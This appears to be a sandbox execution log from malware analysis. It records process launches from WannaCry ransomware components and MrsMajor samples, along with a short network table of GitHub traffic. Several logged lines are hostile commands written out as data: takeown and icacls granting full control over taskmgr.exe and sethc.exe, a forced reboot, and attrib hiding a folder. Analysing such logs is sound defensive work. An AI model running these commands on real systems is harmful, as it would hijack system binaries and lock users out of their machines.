"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2136,12504392617543403793,5939358543246246423,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=73 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7504 /prefetch:1
C:\Users\Admin\Desktop\taskse.exe
taskse.exe C:\Users\Admin\Desktop\@[email protected]
C:\Users\Admin\Desktop\@[email protected]
C:\Users\Admin\Desktop\taskdl.exe
taskdl.exe
C:\Users\Admin\Desktop\Tor Browser\Browser\firefox.exe
"C:\Users\Admin\Desktop\Tor Browser\Browser\firefox.exe" -contentproc --channel="932.13.610932088\930899303" -childID 12 -isForBrowser -prefsHandle 5128 -prefMapHandle 5224 -prefsLen 23035 -prefMapSize 240500 -jsInitHandle 1216 -jsInitLen 240916 -parentBuildID 20240930230510 -win32kLockedDown -appDir "C:\Users\Admin\Desktop\Tor Browser\Browser\browser" - {45467260-f6eb-4c83-9934-bec4d3cebdd7} 932 tab
C:\Users\Admin\Desktop\taskse.exe
taskse.exe C:\Users\Admin\Desktop\@[email protected]
C:\Users\Admin\Desktop\@[email protected]
C:\Users\Admin\Desktop\taskdl.exe
taskdl.exe
C:\Users\Admin\Desktop\taskse.exe
taskse.exe C:\Users\Admin\Desktop\@[email protected]
C:\Users\Admin\Desktop\@[email protected]
C:\Users\Admin\Desktop\taskdl.exe
taskdl.exe
C:\Users\Admin\Desktop\taskse.exe
taskse.exe C:\Users\Admin\Desktop\@[email protected]
C:\Users\Admin\Desktop\@[email protected]
C:\Users\Admin\Desktop\taskdl.exe
taskdl.exe
C:\Windows\SysWOW64\werfault.exe
werfault.exe /h /shared Global\d2654d7926de4804a3c5cbd7af31923d /t 5076 /p 4352
C:\Users\Admin\Desktop\taskse.exe
taskse.exe C:\Users\Admin\Desktop\@[email protected]
C:\Users\Admin\Desktop\@[email protected]
C:\Users\Admin\Desktop\taskdl.exe
taskdl.exe
C:\Users\Admin\Desktop\taskse.exe
taskse.exe C:\Users\Admin\Desktop\@[email protected]
C:\Users\Admin\Desktop\@[email protected]
C:\Users\Admin\Desktop\taskdl.exe
taskdl.exe
C:\Users\Admin\Desktop\taskse.exe
taskse.exe C:\Users\Admin\Desktop\@[email protected]
C:\Users\Admin\Desktop\@[email protected]
C:\Users\Admin\Desktop\taskdl.exe
taskdl.exe
C:\Users\Admin\Desktop\taskse.exe
taskse.exe C:\Users\Admin\Desktop\@[email protected]
C:\Users\Admin\Desktop\@[email protected]
C:\Users\Admin\Desktop\taskdl.exe
taskdl.exe
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --field-trial-handle=2136,12504392617543403793,5939358543246246423,131072 --lang=en-US --service-sandbox-type=collections --mojo-platform-channel-handle=4632 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2136,12504392617543403793,5939358543246246423,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=75 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8760 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --field-trial-handle=2136,12504392617543403793,5939358543246246423,131072 --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=8480 /prefetch:8
C:\Windows\system32\AUDIODG.EXE
C:\Windows\system32\AUDIODG.EXE 0x3f4 0x4f4
C:\Users\Admin\Desktop\taskse.exe
taskse.exe C:\Users\Admin\Desktop\@[email protected]
C:\Users\Admin\Desktop\@[email protected]
C:\Users\Admin\Desktop\taskdl.exe
taskdl.exe
C:\Users\Admin\Desktop\taskse.exe
taskse.exe C:\Users\Admin\Desktop\@[email protected]
C:\Users\Admin\Desktop\@[email protected]
C:\Users\Admin\Desktop\taskdl.exe
taskdl.exe
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2136,12504392617543403793,5939358543246246423,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=78 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8448 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2136,12504392617543403793,5939358543246246423,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=7952 /prefetch:8
C:\Users\Admin\Desktop\taskse.exe
taskse.exe C:\Users\Admin\Desktop\@[email protected]
C:\Users\Admin\Desktop\@[email protected]
C:\Users\Admin\Desktop\taskdl.exe
taskdl.exe
C:\Users\Admin\Desktop\taskse.exe
taskse.exe C:\Users\Admin\Desktop\@[email protected]
C:\Users\Admin\Desktop\@[email protected]
C:\Users\Admin\Desktop\taskdl.exe
taskdl.exe
C:\Users\Admin\Desktop\Tor Browser\Browser\firefox.exe
"C:\Users\Admin\Desktop\Tor Browser\Browser\firefox.exe" -contentproc --channel="932.14.1495202331\640913276" -childID 13 -isForBrowser -prefsHandle 4144 -prefMapHandle 5072 -prefsLen 23035 -prefMapSize 240500 -jsInitHandle 1216 -jsInitLen 240916 -parentBuildID 20240930230510 -win32kLockedDown -appDir "C:\Users\Admin\Desktop\Tor Browser\Browser\browser" - {c759e44f-687b-4529-aeea-e76038d0eab6} 932 tab
C:\Users\Admin\Desktop\taskse.exe
taskse.exe C:\Users\Admin\Desktop\@[email protected]
C:\Users\Admin\Desktop\@[email protected]
C:\Users\Admin\Desktop\taskdl.exe
taskdl.exe
C:\Users\Admin\Desktop\Tor Browser\Browser\firefox.exe
"C:\Users\Admin\Desktop\Tor Browser\Browser\firefox.exe" -contentproc --channel="932.15.1105981800\1925287839" -childID 14 -isForBrowser -prefsHandle 1528 -prefMapHandle 4752 -prefsLen 23035 -prefMapSize 240500 -jsInitHandle 1216 -jsInitLen 240916 -parentBuildID 20240930230510 -win32kLockedDown -appDir "C:\Users\Admin\Desktop\Tor Browser\Browser\browser" - {91afa980-ec24-4262-9677-09296e25b046} 932 tab
C:\Users\Admin\Desktop\Tor Browser\Browser\firefox.exe
"C:\Users\Admin\Desktop\Tor Browser\Browser\firefox.exe" -contentproc --channel="932.16.2084003679\749370723" -childID 15 -isForBrowser -prefsHandle 5664 -prefMapHandle 4428 -prefsLen 23035 -prefMapSize 240500 -jsInitHandle 1216 -jsInitLen 240916 -parentBuildID 20240930230510 -win32kLockedDown -appDir "C:\Users\Admin\Desktop\Tor Browser\Browser\browser" - {a3622a43-7ea1-444d-a448-09a0801ad6fc} 932 tab
C:\Users\Admin\Desktop\Tor Browser\Browser\firefox.exe
"C:\Users\Admin\Desktop\Tor Browser\Browser\firefox.exe" -contentproc --channel="932.17.1061736001\689339932" -childID 16 -isForBrowser -prefsHandle 5536 -prefMapHandle 5540 -prefsLen 23035 -prefMapSize 240500 -jsInitHandle 1216 -jsInitLen 240916 -parentBuildID 20240930230510 -win32kLockedDown -appDir "C:\Users\Admin\Desktop\Tor Browser\Browser\browser" - {0c852d85-99d0-4e0a-ae23-9001aa998871} 932 tab
C:\Users\Admin\Desktop\taskse.exe
taskse.exe C:\Users\Admin\Desktop\@[email protected]
C:\Users\Admin\Desktop\@[email protected]
C:\Users\Admin\Desktop\taskdl.exe
taskdl.exe
C:\Users\Admin\Desktop\taskse.exe
taskse.exe C:\Users\Admin\Desktop\@[email protected]
C:\Users\Admin\Desktop\@[email protected]
C:\Users\Admin\Desktop\taskdl.exe
taskdl.exe
C:\Users\Admin\Desktop\taskse.exe
taskse.exe C:\Users\Admin\Desktop\@[email protected]
C:\Users\Admin\Desktop\@[email protected]
C:\Users\Admin\Desktop\taskdl.exe
taskdl.exe
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2136,12504392617543403793,5939358543246246423,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=81 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7048 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2136,12504392617543403793,5939358543246246423,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=8212 /prefetch:8
C:\Users\Admin\Desktop\taskse.exe
taskse.exe C:\Users\Admin\Desktop\@[email protected]
C:\Users\Admin\Desktop\@[email protected]
C:\Users\Admin\Desktop\taskdl.exe
taskdl.exe
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2136,12504392617543403793,5939358543246246423,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=84 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7496 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2136,12504392617543403793,5939358543246246423,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=8680 /prefetch:8
C:\Users\Admin\Desktop\taskse.exe
taskse.exe C:\Users\Admin\Desktop\@[email protected]
C:\Users\Admin\Desktop\@[email protected]
C:\Users\Admin\Desktop\taskdl.exe
taskdl.exe
C:\Users\Admin\Desktop\Tor Browser\Browser\firefox.exe
"C:\Users\Admin\Desktop\Tor Browser\Browser\firefox.exe" -contentproc --channel="932.18.601373508\1947309379" -childID 17 -isForBrowser -prefsHandle 5280 -prefMapHandle 5200 -prefsLen 23035 -prefMapSize 240500 -jsInitHandle 1216 -jsInitLen 240916 -parentBuildID 20240930230510 -win32kLockedDown -appDir "C:\Users\Admin\Desktop\Tor Browser\Browser\browser" - {5fe385da-0729-4db0-b9f4-ba909b512427} 932 tab
C:\Users\Admin\Desktop\taskse.exe
taskse.exe C:\Users\Admin\Desktop\@[email protected]
C:\Users\Admin\Desktop\@[email protected]
C:\Users\Admin\Desktop\taskdl.exe
taskdl.exe
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2136,12504392617543403793,5939358543246246423,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=86 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8476 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2136,12504392617543403793,5939358543246246423,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=87 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7724 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2136,12504392617543403793,5939358543246246423,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=88 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7692 /prefetch:1
C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
C:\Users\Admin\Desktop\Tor Browser\Browser\firefox.exe
"C:\Users\Admin\Desktop\Tor Browser\Browser\firefox.exe" -contentproc --channel="932.19.674864497\453966284" -childID 18 -isForBrowser -prefsHandle 4820 -prefMapHandle 4228 -prefsLen 23035 -prefMapSize 240500 -jsInitHandle 1216 -jsInitLen 240916 -parentBuildID 20240930230510 -win32kLockedDown -appDir "C:\Users\Admin\Desktop\Tor Browser\Browser\browser" - {8d0e0f92-ff26-406e-ba89-aa480e91606a} 932 tab
C:\Users\Admin\Desktop\taskse.exe
taskse.exe C:\Users\Admin\Desktop\@[email protected]
C:\Users\Admin\Desktop\@[email protected]
C:\Users\Admin\Desktop\taskdl.exe
taskdl.exe
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2136,12504392617543403793,5939358543246246423,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=89 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7664 /prefetch:1
C:\Users\Admin\Desktop\taskse.exe
taskse.exe C:\Users\Admin\Desktop\@[email protected]
C:\Users\Admin\Desktop\@[email protected]
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2136,12504392617543403793,5939358543246246423,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=91 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=9196 /prefetch:1
C:\Users\Admin\Desktop\taskdl.exe
taskdl.exe
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=2136,12504392617543403793,5939358543246246423,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=9444 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2136,12504392617543403793,5939358543246246423,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=94 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=9252 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2136,12504392617543403793,5939358543246246423,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=9004 /prefetch:8
C:\Users\Admin\Desktop\taskse.exe
taskse.exe C:\Users\Admin\Desktop\@[email protected]
C:\Users\Admin\Desktop\@[email protected]
C:\Users\Admin\Desktop\taskdl.exe
taskdl.exe
C:\Windows\SysWOW64\attrib.exe
attrib +h +s F:\$RECYCLE
C:\Users\Admin\Desktop\taskse.exe
taskse.exe C:\Users\Admin\Desktop\@[email protected]
C:\Users\Admin\Desktop\@[email protected]
C:\Users\Admin\Desktop\taskdl.exe
taskdl.exe
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2136,12504392617543403793,5939358543246246423,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=96 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8840 /prefetch:1
C:\Users\Admin\Desktop\taskse.exe
taskse.exe C:\Users\Admin\Desktop\@[email protected]
C:\Users\Admin\Desktop\@[email protected]
C:\Users\Admin\Desktop\taskdl.exe
taskdl.exe
C:\Users\Admin\Desktop\taskse.exe
taskse.exe C:\Users\Admin\Desktop\@[email protected]
C:\Users\Admin\Desktop\@[email protected]
C:\Users\Admin\Desktop\taskdl.exe
taskdl.exe
C:\Users\Admin\Desktop\taskse.exe
taskse.exe C:\Users\Admin\Desktop\@[email protected]
C:\Users\Admin\Desktop\@[email protected]
C:\Users\Admin\Desktop\taskdl.exe
taskdl.exe
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2136,12504392617543403793,5939358543246246423,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=97 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=10132 /prefetch:1
C:\Users\Admin\Desktop\taskse.exe
taskse.exe C:\Users\Admin\Desktop\@[email protected]
C:\Users\Admin\Desktop\@[email protected]
C:\Users\Admin\Desktop\taskdl.exe
taskdl.exe
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --field-trial-handle=2136,12504392617543403793,5939358543246246423,131072 --lang=en-US --service-sandbox-type=collections --mojo-platform-channel-handle=8744 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2136,12504392617543403793,5939358543246246423,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=99 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7312 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2136,12504392617543403793,5939358543246246423,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=100 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=10220 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2136,12504392617543403793,5939358543246246423,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=101 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6352 /prefetch:1
C:\Users\Admin\Desktop\taskse.exe
taskse.exe C:\Users\Admin\Desktop\@[email protected]
C:\Users\Admin\Desktop\@[email protected]
C:\Users\Admin\Desktop\taskdl.exe
taskdl.exe
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --field-trial-handle=2136,12504392617543403793,5939358543246246423,131072 --lang=en-US --service-sandbox-type=collections --mojo-platform-channel-handle=10148 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2136,12504392617543403793,5939358543246246423,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=103 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=9248 /prefetch:1
C:\Users\Admin\Desktop\Tor Browser\Browser\firefox.exe
"C:\Users\Admin\Desktop\Tor Browser\Browser\firefox.exe" -contentproc --channel="932.20.2029994410\1460208489" -childID 19 -isForBrowser -prefsHandle 5700 -prefMapHandle 5712 -prefsLen 23035 -prefMapSize 240500 -jsInitHandle 1216 -jsInitLen 240916 -parentBuildID 20240930230510 -win32kLockedDown -appDir "C:\Users\Admin\Desktop\Tor Browser\Browser\browser" - {35824dab-a00c-4082-bca8-03cd2843fe76} 932 tab
C:\Users\Admin\Desktop\taskse.exe
taskse.exe C:\Users\Admin\Desktop\@[email protected]
C:\Users\Admin\Desktop\@[email protected]
C:\Users\Admin\Desktop\taskdl.exe
taskdl.exe
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2136,12504392617543403793,5939358543246246423,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=104 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=10144 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2136,12504392617543403793,5939358543246246423,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=105 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=9032 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2136,12504392617543403793,5939358543246246423,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=106 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8756 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2136,12504392617543403793,5939358543246246423,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=107 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=9668 /prefetch:1
C:\Users\Admin\Desktop\taskse.exe
taskse.exe C:\Users\Admin\Desktop\@[email protected]
C:\Users\Admin\Desktop\@[email protected]
C:\Users\Admin\Desktop\taskdl.exe
taskdl.exe
C:\Users\Admin\Desktop\taskse.exe
taskse.exe C:\Users\Admin\Desktop\@[email protected]
C:\Users\Admin\Desktop\@[email protected]
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2136,12504392617543403793,5939358543246246423,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=109 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=9672 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2136,12504392617543403793,5939358543246246423,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=8900 /prefetch:8
C:\Users\Admin\Desktop\taskdl.exe
taskdl.exe
C:\Users\Admin\Desktop\taskse.exe
taskse.exe C:\Users\Admin\Desktop\@[email protected]
C:\Users\Admin\Desktop\@[email protected]
C:\Users\Admin\Desktop\taskdl.exe
taskdl.exe
C:\Windows\system32\pcwrun.exe
C:\Windows\system32\pcwrun.exe "C:\Users\Admin\Downloads\Ransomware.WannaCry_Plus\Win32.Wannacry.exe" CompatTab
C:\Windows\System32\msdt.exe
C:\Windows\System32\msdt.exe -path C:\Windows\diagnostics\index\PCWDiagnostic.xml -af C:\Users\Admin\AppData\Local\Temp\PCWA263.xml /skip TRUE
C:\Windows\System32\sdiagnhost.exe
C:\Windows\System32\sdiagnhost.exe -Embedding
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\0j1dywyp\0j1dywyp.cmdline"
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESA8BC.tmp" "c:\Users\Admin\AppData\Local\Temp\0j1dywyp\CSC6B5E779C6C1400AB8651E96C91284EC.TMP"
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\zupftdft\zupftdft.cmdline"
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESA8FB.tmp" "c:\Users\Admin\AppData\Local\Temp\zupftdft\CSC153F44EF75ED4BC2A4D5357074D73E3E.TMP"
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\4q3aoqub\4q3aoqub.cmdline"
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESABD9.tmp" "c:\Users\Admin\AppData\Local\Temp\4q3aoqub\CSC2C07E40A6ECA4B41A418D8F75E89C187.TMP"
C:\Users\Admin\Desktop\taskse.exe
taskse.exe C:\Users\Admin\Desktop\@[email protected]
C:\Users\Admin\Desktop\@[email protected]
C:\Users\Admin\Desktop\taskdl.exe
taskdl.exe
C:\Windows\system32\rundll32.exe
"C:\Windows\system32\rundll32.exe" C:\Windows\system32\pcwutl.dll,LaunchApplication "C:\Users\Admin\Downloads\Ransomware.WannaCry_Plus\Win32.Wannacry.exe"
C:\Users\Admin\Desktop\taskse.exe
taskse.exe C:\Users\Admin\Desktop\@[email protected]
C:\Users\Admin\Desktop\@[email protected]
C:\Users\Admin\Desktop\taskdl.exe
taskdl.exe
C:\Users\Admin\Desktop\Tor Browser\Browser\firefox.exe
"C:\Users\Admin\Desktop\Tor Browser\Browser\firefox.exe" -contentproc --channel="932.21.2110687007\1202149057" -childID 20 -isForBrowser -prefsHandle 5904 -prefMapHandle 6076 -prefsLen 23035 -prefMapSize 240500 -jsInitHandle 1216 -jsInitLen 240916 -parentBuildID 20240930230510 -win32kLockedDown -appDir "C:\Users\Admin\Desktop\Tor Browser\Browser\browser" - {fd8e34cf-2d83-4f35-bb7f-c62d967bdbce} 932 tab
C:\Users\Admin\Downloads\MrsMajor2.0.exe
"C:\Users\Admin\Downloads\MrsMajor2.0.exe"
C:\Windows\system32\wscript.exe
"C:\Windows\sysnative\wscript.exe" C:\Users\Admin\AppData\Local\Temp\A78F.tmp\A790.vbs
C:\Users\Admin\Desktop\taskse.exe
taskse.exe C:\Users\Admin\Desktop\@[email protected]
C:\Users\Admin\Desktop\@[email protected]
C:\Users\Admin\Desktop\taskdl.exe
taskdl.exe
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c cd\&cd "C:\Users\Admin\AppData\Local\Temp" & eula32.exe
C:\Users\Admin\AppData\Local\Temp\eula32.exe
eula32.exe
C:\Users\Admin\Downloads\MrsMajor3.0.exe
"C:\Users\Admin\Downloads\MrsMajor3.0.exe"
C:\Program Files\MicrosoftWindowsServicesEtc\GetReady.exe
"C:\Program Files\MicrosoftWindowsServicesEtc\GetReady.exe"
C:\Windows\system32\cmd.exe
"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\1\DCB8.bat "C:\Program Files\MicrosoftWindowsServicesEtc\GetReady.exe""
C:\Windows\system32\wscript.exe
"C:\Windows\system32\wscript.exe" C:\Users\Admin\AppData\Local\Temp\DCB8.tmp\DCB9.tmp\DCBA.vbs //Nologo
C:\Windows\System32\takeown.exe
takeown /f taskmgr.exe
C:\Windows\System32\icacls.exe
icacls taskmgr.exe /granted "Admin":F
C:\Windows\System32\takeown.exe
takeown /f sethc.exe
C:\Windows\System32\icacls.exe
icacls sethc.exe /granted "Admin":F
C:\Users\Admin\AppData\Local\Temp\DCB8.tmp\eulascr.exe
"C:\Users\Admin\AppData\Local\Temp\DCB8.tmp\eulascr.exe"
C:\Program Files\MicrosoftWindowsServicesEtc\notmuch.exe
"C:\Program Files\MicrosoftWindowsServicesEtc\notmuch.exe"
C:\Windows\System32\shutdown.exe
"C:\Windows\System32\shutdown.exe" -r -t 5
C:\Windows\system32\LogonUI.exe
"LogonUI.exe" /flags:0x4 /state0:0xa3f07855 /state1:0x41c64e6d
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:80 | github.com | tcp |
| GB | 20.26.156.215:80 | github.com | tcp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | avatars.githubusercontent.com | udp |
| US | 8.8.8.8:53 | github.githubassets.com | udp |
| US | 185.199.108.154:443 | github.githubassets.com | tcp |
| US | 185.199.111.133:443 | avatars.githubusercontent.com | tcp |
| US | 185.199.108.154:443 | github.githubassets.com | tcp |
